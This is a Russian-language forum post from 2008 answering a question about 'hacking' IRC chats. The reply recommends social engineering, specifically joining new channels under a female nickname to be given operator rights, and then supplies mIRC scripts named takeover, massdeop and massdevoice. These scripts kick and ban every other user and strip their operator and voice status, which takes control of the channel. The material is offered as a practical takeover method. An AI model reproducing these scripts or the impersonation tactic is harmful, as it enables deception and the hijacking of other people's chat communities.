Показать сообщение отдельно

Старый 04.03.2008, 00:45
CrazyStudentS_Mi}{
Постоянный
Провел на форуме:
2504528

Цитата:
Сообщение от LAEOT  
Привет Всем!
Я хочу узнать все об IRC чатов.
Подаютсья они взлому или нет (онлайн irc чаты)?
Какие есть команды в irc чате ?
Есть ли полезные сылки на стати или сайты?
Если нужна определёная сылка на чат который я хочу вломать,я могу дать.
Есть ли особенвые слабости?
Построение сылки следошие:
www.site/index.php?nick= имя&server=сервер&chan=канал&x=81&y=17

ВНИМАНИЕ ЭТО НЕ ПРОСБА О ВСЛОМЕ!
Зарание спасибо за информацию.
в ирк рулит СИ, пароль там выманить просто, также очень любимм мною метод захвата мелких новоиспеченых каналов - где девушкам дают оператора, заходишь под женским ником, получаешь опа и претворяешь вот такой скрипт состоящий из нескольких разделов

############### alias takeover { %i = 1 mode # +eeee $me mode # +iSpsl 1 while $nick(#,%i) != $null { if ($nick(#,%i) !isin $me ) kick # $nick(#,%i) %quit_msg Kick №: %kickun inc %i } unset %i mode # +b * } on *:unban:#:{ if ($banmask == *!*@*) mode # +b *!*@* }

############ alias massdeop { if ($me !isop #) { %lser Ты не оператор канала. } else { %lse Произвожу масс. ДеОП (-o) на канале # $+ ... set %i 1 :next set %nick $nick(#,%i) if (%nick == $null) goto done if (%nick isop #) && (%nick != $me) { mode # -o %nick } inc %i goto next :done } }

##############alias massdevoice { ;%lse1 Произвожу масс. ДеОП (-o) на канале # $+ ... set %i 1 .cs devoice $chan :next set %nick $nick(#,%i) if (%nick == $null) goto done if (%nick != $me) { .cs devoice $chan %nick } inc %i goto next :done } }